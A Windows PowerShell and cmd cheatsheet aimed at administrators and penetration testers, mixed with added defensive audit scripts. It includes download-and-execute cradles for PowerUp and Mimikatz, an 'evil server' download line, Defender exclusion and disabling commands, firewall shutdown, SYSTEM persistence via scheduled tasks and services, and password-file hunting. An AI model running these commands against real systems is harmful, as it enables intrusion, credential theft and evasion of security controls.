Windows Command Line Cheatsheet


Enable ISE using powershell

In the few months that I've been developing in PowerShell, I've found the ISE to be incredibly useful. If you get on a new machine and the ISE isn't there, here's how you can get it going from the PowerShell terminal:

Import-Module ServerManager
Add-WindowsFeature Powershell-ISE

Securely store credentials in XML for Import

Start out by storing your username and password (in a SecureString format) in a PSCredential object:

$cred = Get-Credential

Next, go ahead and export your credentials to an xml file:

$cred | Export-CliXml <location>.clixml

Finally, when you need it, import the credentials from the XML file and store them in a variable ($cred2 in this particular scenario):

$cred2 = Import-CliXml <location>.clixml
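The full round trip, as an added example that is not part of the original cheatsheet, including the check a practitioner wants: the exported file holds the password as a DPAPI blob bound to the exporting user on the exporting machine, not as plaintext, so it is usable by that user's scripts but not portable to another account or host. The path, user name and password below are illustrative assumptions.

```powershell
# Added example, not from the original cheatsheet. Round-trips a PSCredential
# through Export-CliXml / Import-CliXml and shows what the file does protect.
# $credPath, the user name and the password are illustrative assumptions.
$credPath = Join-Path $env:LOCALAPPDATA 'svc-backup.clixml'

# Build the credential without a prompt so this runs unattended; at a console
# you would just do: $cred = Get-Credential
$securePass = ConvertTo-SecureString 'P@ssw0rd-example' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('CORP\svc-backup', $securePass)

# Export. The SecureString is written as a DPAPI blob bound to the current
# user on the current machine; the user name is stored in clear text.
$cred | Export-CliXml -Path $credPath

# Import and use: pass the object to any -Credential parameter, e.g.
# Invoke-Command -ComputerName <host> -Credential $cred2 -ScriptBlock { whoami }
$cred2 = Import-CliXml -Path $credPath
"Loaded credential for $($cred2.UserName)"

# Anyone who can read the file AS THIS USER can recover the plaintext, so the
# file is only as secret as the user's session and profile.
$plain = $cred2.GetNetworkCredential().Password
if ($plain -ne 'P@ssw0rd-example') { throw 'round-trip failed' }

# The on-disk form is not the plaintext: the XML carries a hex DPAPI blob.
if ((Get-Content $credPath -Raw) -match 'P@ssw0rd-example') {
    throw 'plaintext leaked into the file'
}

# A different user on this host, or this user on another host, cannot decrypt
# the blob (their DPAPI master key differs), so Import-CliXml fails for them.
# Still, lock the file down to the owner so the blob cannot be copied around.
$acl  = Get-Acl $credPath
$acl.SetAccessRuleProtection($true, $false)     # stop inheriting parent ACEs
$me   = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
$rule = New-Object System.Security.AccessControl.FileSystemAccessRule($me, 'FullControl', 'Allow')
$acl.SetAccessRule($rule)
Set-Acl -Path $credPath -AclObject $acl
(Get-Acl $credPath).Access | Select-Object IdentityReference, FileSystemRights
```

If the script has to run under a service account, export the file while running as that account (for example through a scheduled task), because a blob exported from your own session will not decrypt for it.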

Command output to file

Append this to whatever you're running to get the output in a text file:

| Out-File <location>

For example, if we want to run Invoke-AllChecks from PowerUp and output in a file called output.txt in C:\temp:

Invoke-AllChecks | Out-File C:\temp\output.txt

Command output to clipboard

Command | Clip

Require powershell script run as admin

Add this to the top of the powershell file: #Requires -RunAsAdministrator


Unzip file

Expand-Archive -Path <file>.zip -DestinationPath C:\temp\myfile


Download file

$url = ""
$outpath = "C:\temp\somebinary.exe"
Invoke-WebRequest -Uri $url -OutFile $outpath

Another way to download a file

Run from cmd:

powershell -exec bypass -c "(New-Object Net.WebClient).DownloadFile('','C:\temp\launcher.bat')"

Download PowerUp with Powershell <= v.2.0

This will get you the PowerUp powershell script and put it in C:\Temp, or some folder that the user you're on has permissions to write to.

You can also modify this snippet to download files if wget isn't available.

$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile("", "C:\Temp\PowerUp.ps1")

one-liner alternative:

(New-Object System.Net.WebClient).DownloadFile("","C:\Temp\PowerUp.ps1")

another one:

powershell.exe -ep bypass -c "IEX ((New-Object Net.WebClient).DownloadString(''))"

(-c is -Command; the -e switch is resolved as -EncodedCommand and expects a base64 string, so it will not run plain PowerShell text.)

Another way to decode and execute a base64-encoded PowerShell payload can be found here.

Using PowerUp

import-module c:\PowerUp\powerup.ps1
# Run all the checks
Invoke-AllChecks

PowerUp one-liner

Get PowerUp, run it, and output to a text file so we can read the output easily.
powershell.exe -NoP -NonI -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString(''); Invoke-AllChecks > C:\Temp\PU.txt"

Powershell MimiKatz

powershell.exe -NoP -NonI -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz"

Tail a logfile

You can effectively tail -f the last two lines from a log file with the following:
Get-Content logfile.log -Tail 2 -Wait

Run a PowerShell script to get around the "execution of scripts is disabled" error

Execution policy is a per-process setting, not a security boundary, so it can be overridden on the command line:

powershell -ExecutionPolicy Bypass -File <file>.ps1

Download sysinternals

First you need to ignore SSL trust. This callback disables certificate validation for every HTTPS connection the process makes afterwards, so anything on the network path can swap the payload; only use it where the host genuinely presents an untrusted certificate, and verify the download's hash afterwards:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
then you can download it (DownloadFile needs a full file path as the second argument, not just a folder):
(New-Object System.Net.WebClient).DownloadFile("","C:\Temp\")
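The hardened counterpart to the downloads above, as an added example that is not part of the original cheatsheet: keep certificate validation on, force TLS 1.2 (older Windows PowerShell may otherwise negotiate TLS 1.0 and fail), and refuse to use the file unless its SHA-256 matches a value obtained out of band. The function name, URL and hash value are assumptions.

```powershell
# Added example, not from the original cheatsheet. Downloads without disabling
# certificate validation and verifies a SHA-256 obtained out of band.
# Get-VerifiedFile, the URL and the hash below are placeholders/assumptions.
function Get-VerifiedFile {
    param(
        [Parameter(Mandatory)] [string] $Url,
        [Parameter(Mandatory)] [string] $OutFile,
        [Parameter(Mandatory)] [string] $ExpectedSha256
    )
    # Force TLS 1.2: Windows PowerShell 5.1 on older builds defaults to
    # TLS 1.0 and modern servers reject that handshake.
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

    # Download to a temp name so a half-written or tampered file never sits
    # at $OutFile where something might run it.
    $tmp = "$OutFile.partial"
    Invoke-WebRequest -Uri $Url -OutFile $tmp -UseBasicParsing

    $actual = (Get-FileHash -Path $tmp -Algorithm SHA256).Hash   # uppercase hex
    if ($actual -ne $ExpectedSha256.ToUpper()) {
        Remove-Item $tmp -Force
        throw "Hash mismatch for ${Url}: expected $ExpectedSha256, got $actual"
    }
    Move-Item -Path $tmp -Destination $OutFile -Force
    Get-Item $OutFile
}

# Usage (URL and hash are assumptions for illustration):
# Get-VerifiedFile -Url 'https://example.invalid/tool.zip' -OutFile 'C:\Temp\tool.zip' `
#     -ExpectedSha256 '0000000000000000000000000000000000000000000000000000000000000000'
```

The hash check is what makes the validation-callback trick above survivable: if you must disable certificate checking for a one-off, the SHA-256 comparison still catches a swapped payload.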

Useful powershell one-liners:

Get hostname:
List local accounts on a system:
Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount='True'"
Check if system is joined to a domain or a workgroup:
if ((gwmi win32_computersystem).partofdomain -eq $true) { write-host -fore green 'This system is on a domain' } else { write-host -fore red 'This system is part of a workgroup' }

Set environment variable


Show env vars in running script

gci env:* | Sort-Object Name

Check if system is running a desktop version of windows

# Heuristic: server SKUs are (roughly) 7-10, 12-15 and 17-25; anything else is treated as desktop.
# The pattern is unanchored, so SKU 101 (Windows 10 Home) matches "10" and is misreported as server.
# (gwmi win32_operatingsystem).ProductType is the reliable check: 1 = workstation, 2 = DC, 3 = server.
$windesktop = (gwmi win32_operatingsystem).OperatingSystemSKU -notmatch "(\b[7-9]|10|1[2-5]|1[7-9]|2[0-5])"
if ($windesktop) {
    write-output "OS is a flavor of Windows Desktop"
}

Get Windows kernel version


Get list of IPv4 addr

(gwmi Win32_NetworkAdapterConfiguration | ? { $_.IPAddress -ne $null }).IPAddress | ? { $_ -match '^\d{1,3}(\.\d{1,3}){3}$' }

Without the final filter the IPAddress array returns IPv6 addresses as well.
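The one-liners above gathered into a single function, as an added example that is not part of the original cheatsheet: hostname, domain or workgroup membership, OS caption and version (the kernel build), workstation/server role via ProductType, IPv4 addresses only, local accounts, and whether the current token is elevated. It uses the same WMI classes through Get-CimInstance; the function name Get-HostSummary is mine.

```powershell
# Added example, not from the original cheatsheet. Collects in one object the
# facts the individual one-liners above fetch separately. Get-HostSummary is an
# assumed name; the WMI classes are the ones the cheatsheet already uses.
function Get-HostSummary {
    $cs = Get-CimInstance Win32_ComputerSystem
    $os = Get-CimInstance Win32_OperatingSystem

    # ProductType is the reliable workstation/server discriminator:
    # 1 = workstation, 2 = domain controller, 3 = member/standalone server.
    $role = switch ($os.ProductType) {
        1       { 'Workstation' }
        2       { 'DomainController' }
        3       { 'Server' }
        default { "Unknown($($os.ProductType))" }
    }

    $nameSpace = if ($cs.PartOfDomain) { $cs.Domain } else { $cs.Workgroup }

    # Only IPv4: the IPAddress array on each adapter mixes v4 and v6.
    $ipv4 = Get-CimInstance Win32_NetworkAdapterConfiguration |
        Where-Object { $_.IPEnabled } |
        ForEach-Object { $_.IPAddress } |
        Where-Object { $_ -match '^\d{1,3}(\.\d{1,3}){3}$' }

    # LocalAccount='True' keeps domain accounts out of the list on joined hosts.
    $localUsers = Get-CimInstance Win32_UserAccount -Filter "LocalAccount='True'" |
        Select-Object Name, Disabled, PasswordRequired, PasswordExpires

    $identity = [Security.Principal.WindowsIdentity]::GetCurrent()
    $isAdmin  = ([Security.Principal.WindowsPrincipal]$identity).IsInRole(
        [Security.Principal.WindowsBuiltInRole]::Administrator)

    [PSCustomObject]@{
        Hostname      = $env:COMPUTERNAME
        PartOfDomain  = $cs.PartOfDomain
        DomainOrGroup = $nameSpace
        OSCaption     = $os.Caption
        OSVersion     = $os.Version        # e.g. 10.0.19045 = kernel major.minor.build
        Role          = $role
        Is64Bit       = [Environment]::Is64BitOperatingSystem
        IPv4Addresses = @($ipv4)
        LocalAccounts = @($localUsers)
        RunningAs     = $identity.Name
        IsElevated    = $isAdmin
    }
}

Get-HostSummary | Format-List
```

Get-CimInstance replaces Get-WmiObject on PowerShell 3+ (and is the only one available on PowerShell 7); on a PowerShell 2.0 box swap each call back to gwmi with the same class names.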

Change hostname

Win32_ComputerSystem exposes a Rename method; the new name takes effect after a reboot (on PowerShell 3+ Rename-Computer does the same):

(Get-WmiObject -Class Win32_ComputerSystem).Rename("<newname>")

Log script output to file

Start-Transcript -path c:\windows\temp\interesting.log -Append -force

# do stuff

# Close the transcript explicitly; otherwise it is only flushed and closed when the session ends
Stop-Transcript
exit 1001

Open file with notepad

Start-Process notepad "C:\Program Files\Bla\bla.txt"


List Exclusions in Defender

Get-MpPreference | Select-Object -ExpandProperty ExclusionPath

The same works for ExclusionProcess and ExclusionExtension.


Add exe to defender allowlist

Add-MpPreference -ExclusionProcess "C:\Temp\mimikatz\x64\mimikatz.exe"

Add extension to defender allowlist

This particular code will allowlist all files that end with a .txt extension:

Add-MpPreference -ExclusionExtension "txt"

Add folder to defender allowlist

Add-MpPreference -ExclusionPath "C:\Folder1"


Stop and Start Defender

Stop real-time monitoring (needs an elevated prompt; with Tamper Protection enabled the call is ignored and protection stays on):

Set-MpPreference -DisableRealtimeMonitoring $true

Start it again:

Set-MpPreference -DisableRealtimeMonitoring $false
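The defender's view of the commands in this section, as an added example that is not part of the original cheatsheet: dump every exclusion, report whether real-time protection is on and whether Tamper Protection would block the Set-MpPreference calls above, and pull the Defender configuration-change events (ID 5007) that an exclusion add or a real-time toggle leaves behind. The function names and the list of "suspicious" exclusion roots are assumptions.

```powershell
# Added example, not from the original cheatsheet. Audits Defender settings the
# way a responder would after the commands above have been run on a host.
# Get-DefenderPosture / Get-DefenderConfigChanges and the path list are assumptions.
function Get-DefenderPosture {
    $pref   = Get-MpPreference
    $status = Get-MpComputerStatus

    # Exclusions under temp and per-user trees are the ones to ask about;
    # legitimate admin tooling rarely needs them there.
    $suspiciousPaths = @($pref.ExclusionPath) | Where-Object {
        $_ -and $_ -match '(?i)^(C:\\Temp|C:\\Users\\|C:\\ProgramData\\|C:\\Windows\\Temp)'
    }

    [PSCustomObject]@{
        RealTimeProtectionEnabled = $status.RealTimeProtectionEnabled
        TamperProtected           = $status.IsTamperProtected
        DisableRealtimeMonitoring = $pref.DisableRealtimeMonitoring
        ExclusionPath             = @($pref.ExclusionPath)
        ExclusionProcess          = @($pref.ExclusionProcess)
        ExclusionExtension        = @($pref.ExclusionExtension)
        SuspiciousExclusionPaths  = @($suspiciousPaths)
    }
}

function Get-DefenderConfigChanges {
    param([int] $Days = 7)
    # Event 5007 = "antimalware platform configuration changed". Its message
    # carries the old and new value, so Add-MpPreference and
    # Set-MpPreference -DisableRealtimeMonitoring both show up here.
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5007
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Message
}

Get-DefenderPosture | Format-List
Get-DefenderConfigChanges | Format-Table -Wrap
```

Run it elevated; Get-MpPreference works for a standard user, but the event log query and some Get-MpComputerStatus fields do not.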




Download a file with the wget alias (Invoke-WebRequest)

wget http://<evil server>/evil.exe -Outfile evil.exe

Open command shell as a user

runas /profile /user:domain\username cmd

Open a powershell window as a user

runas /profile /user:domain\username powershell

Check Permissions for folder

icacls <path>

Netstat with findstr

This is an example of what I equate to running netstat and piping the results through grep in Linux.
This is probably closer to netstat with grep:

netstat -ano | findstr 443

Netstat with find

Another way to run netstat and grep for something. In PowerShell you need to escape the double quotes with backticks, otherwise PowerShell strips them before find.exe sees them and it throws an error. The -b switch (show the executable that owns each connection) needs an elevated prompt:

netstat -anob  | find `"443`"

Check if rdp is enabled

A listener on TCP 3389 is a good hint, but the authoritative setting is the fDenyTSConnections value under HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server (0 = RDP enabled):

netstat -a -n -p tcp | findstr 3389


Look for files with passwords:

dir /b /s web.config
dir /b /s unattend.xml
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
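The same hunt in PowerShell, as an added example that is not part of the original cheatsheet, extended to look inside the hits for password-like lines instead of just listing file names. The search roots, the size cap and the match/noise patterns are assumptions to tune for the environment.

```powershell
# Added example, not from the original cheatsheet. Finds the files the
# dir /b /s lines above look for and greps them for credential-looking lines.
# Find-CredentialFiles, the default roots and the regexes are assumptions.
function Find-CredentialFiles {
    param(
        [string[]] $Roots     = @('C:\inetpub', 'C:\Windows\Panther', 'C:\Users', 'C:\ProgramData'),
        [string[]] $Names     = @('web.config', 'unattend.xml', 'sysprep.inf', 'sysprep.xml', '*pass*'),
        [int]      $MaxSizeMB = 5,
        # "password=..." / "pwd: ..." style keys and connection strings
        [string]   $Pattern   = '(?i)(password|pwd|passwd|connectionString)\s*[=:]\s*\S',
        # values that are obviously scrubbed or templated
        [string]   $Noise     = '(?i)(\*SENSITIVE\*DATA\*DELETED\*|changeme|<password>\s*</password>)'
    )
    foreach ($root in $Roots) {
        if (-not (Test-Path $root)) { continue }
        Get-ChildItem -Path $root -Recurse -File -Include $Names -ErrorAction SilentlyContinue |
            Where-Object { $_.Length -lt $MaxSizeMB * 1MB } |
            ForEach-Object {
                $file = $_
                $hits = Select-String -Path $file.FullName -Pattern $Pattern -ErrorAction SilentlyContinue |
                    Where-Object { $_.Line -notmatch $Noise }
                if ($hits) {
                    foreach ($h in $hits) {
                        [PSCustomObject]@{ File = $file.FullName; Line = $h.LineNumber; Text = $h.Line.Trim() }
                    }
                } else {
                    # Still report the file: unattend.xml stores passwords as
                    # base64 inside <Value> elements, which the regex does not catch.
                    [PSCustomObject]@{ File = $file.FullName; Line = 0; Text = '(name match only)' }
                }
            }
    }
}

Find-CredentialFiles | Format-Table -AutoSize -Wrap
```

The size cap keeps Select-String off multi-gigabyte logs that happen to match *pass*; raise it when you know the target file.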

Disable firewall

netsh advfirewall set allprofiles state off

Search processes

Similar to using ps and piping the output to grep in Linux:

tasklist | findstr processname

Make administrator user active

net user administrator /active:yes

Set account to never expire and keep it active

Note that /expires:never controls account expiry, not password expiry. A never-expiring password is a separate flag (the PasswordExpires property on the Win32_UserAccount WMI object, or Set-LocalUser -PasswordNeverExpires $true on PowerShell 5.1+):

net user user /expires:never /active:yes /logonpasswordchg:no

Create Scheduled task

On start up as system:

schtasks /create /sc onstart /tn "NameofTask" /tr "C:\tools\shell.exe" /ru "SYSTEM"

To run every minute as system:

schtasks /create /sc minute /mo 1 /tn "NameofTask" /tr "C:\tools\shell.exe" /ru "SYSTEM"

List Scheduled tasks


Delete Scheduled task

schtasks /delete /tn "NameofTask" /f

Create service

On start up. Note the space after each "=": sc.exe parses "binpath=" as the option name and the next token as its value, so binpath="..." without the space is rejected. cmd.exe is not a real service binary, so the SCM reports a start timeout (about 30 seconds) and marks the service failed, but the child process has already been spawned by then:

sc create ServiceName binpath= "cmd.exe /k C:\Temp\shell.exe" start= auto obj= LocalSystem

List Services

sc query

By default this lists only running services; add "state= all" to include stopped ones.

Query Service

sc qc ServiceName


sc query ServiceName

Stop service

sc stop ServiceName

Start service

sc start ServiceName

Delete Service

sc delete ServiceName

Useful CMD one-liners:

Open event viewer from cmd:
Open services msc:
Lists all the service information for each process:
tasklist /svc
Kill a process by PID:
taskkill /pid <pid> /f
Kill firefox (or any process) by name:
taskkill /im firefox.exe /f
Delete a file:
del <file name>
List drives:
fsutil fsinfo drives
Show users with active sessions:
quser or query user
Show active network sessions:
netstat -vb
Get last modified file in a directory (conceptually similar to ls -lart):
dir /O:D /T:W /A:-D
Rename file:
move file new-file-name
Show contents of file:
type file.txt
Current user and privilege info
whoami /all
List users
net users
List domain users and output to a file
net user /domain > domain-user-list.txt
List domain controller the current system is authenticated with
Get FSMO roles for current domain (useful info about domain controller setup)
List all domain controllers in the current domain
net group "Domain Controllers" /domain
Print password policy

net accounts

Reboot system immediately

shutdown /r /t 0

Query the registry

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Add a key to the registry

This particular value, LocalAccountTokenFilterPolicy = 1, turns off UAC remote restrictions: local administrator accounts then get a full admin token over the network (SMB, WMI, WinRM) instead of a filtered one, which is what makes pass-the-hash with local accounts work against the box. Treat its presence as a finding:

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

Remove a key from the registry

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ /v hFaZvOAsF /f
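An audit of the three persistence mechanisms this cheatsheet uses (scheduled tasks, services and the Run keys), as an added example that is not part of the original cheatsheet. It flags entries that run as SYSTEM or launch from temp and per-user locations, checks services for the unquoted-path condition, and warns if LocalAccountTokenFilterPolicy is set. The function names, the "suspect root" pattern and the exclusion of the \Microsoft\ task folder are assumptions to tune.

```powershell
# Added example, not from the original cheatsheet. Audits scheduled tasks,
# services and Run keys for the kind of entries the commands above create.
# Function names, $suspectRoot and the \Microsoft\ task exclusion are assumptions.
$suspectRoot = '(?i)^"?(C:\\Temp|C:\\Users\\|C:\\ProgramData\\|C:\\Windows\\Temp|%TEMP%|%APPDATA%)'

function Get-TaskFindings {
    # Get-ScheduledTask is the PowerShell side of schtasks /query (Windows 8 / 2012+).
    Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\*' } | ForEach-Object {
        $task = $_
        foreach ($action in @($task.Actions)) {
            $cmd = "$($action.Execute) $($action.Arguments)".Trim()
            [PSCustomObject]@{
                Kind    = 'ScheduledTask'
                Name    = "$($task.TaskPath)$($task.TaskName)"
                RunAs   = $task.Principal.UserId
                Command = $cmd
                Flag    = ($cmd -match $suspectRoot) -or ($task.Principal.UserId -in 'SYSTEM', 'S-1-5-18')
            }
        }
    }
}

function Get-ServiceFindings {
    Get-CimInstance Win32_Service | ForEach-Object {
        $path = [string]$_.PathName
        # Unquoted path with a space before the .exe, outside C:\Windows, is the
        # classic unquoted-service-path privilege-escalation condition.
        $unquoted = ($path -notmatch '^"') -and ($path -match '(?i)^\S*\s.*?\.exe') -and
                    ($path -notmatch '(?i)^C:\\Windows\\')
        [PSCustomObject]@{
            Kind    = 'Service'
            Name    = $_.Name
            RunAs   = $_.StartName
            Command = $path
            Flag    = ($path -match $suspectRoot) -or $unquoted -or ($path -match '(?i)\b(cmd|powershell)(\.exe)?\b')
        }
    }
}

function Get-RunKeyFindings {
    $keys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
            'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) { continue }
        $scope = if ($key -like 'HKLM:*') { 'all users' } else { 'current user' }
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }    # PSPath, PSParentPath, ... are provider metadata
            $cmd = [string]$p.Value
            [PSCustomObject]@{
                Kind    = 'RunKey'
                Name    = "$key\$($p.Name)"
                RunAs   = $scope
                Command = $cmd
                Flag    = ($cmd -match $suspectRoot) -or ($cmd -match '(?i)\b(cmd|powershell|mshta|rundll32|wscript)(\.exe)?\b')
            }
        }
    }
}

# LocalAccountTokenFilterPolicy=1 removes UAC remote restrictions for local admins.
$pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -ErrorAction SilentlyContinue
if ($pol.LocalAccountTokenFilterPolicy -eq 1) {
    Write-Warning 'LocalAccountTokenFilterPolicy=1: local admin accounts get full tokens over the network'
}

$findings = @(Get-TaskFindings) + @(Get-ServiceFindings) + @(Get-RunKeyFindings)
$findings | Where-Object Flag | Format-Table Kind, Name, RunAs, Command -AutoSize -Wrap
```

Drop the Where-Object Flag filter to see the full inventory; the flagged view is the one to diff against a known-good build.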

Show environment variables
How to rm -rf

rd /s /q "path"

Resources

- creating scheduled tasks
- creating services
- how to rm -rf
- adding a key to the registry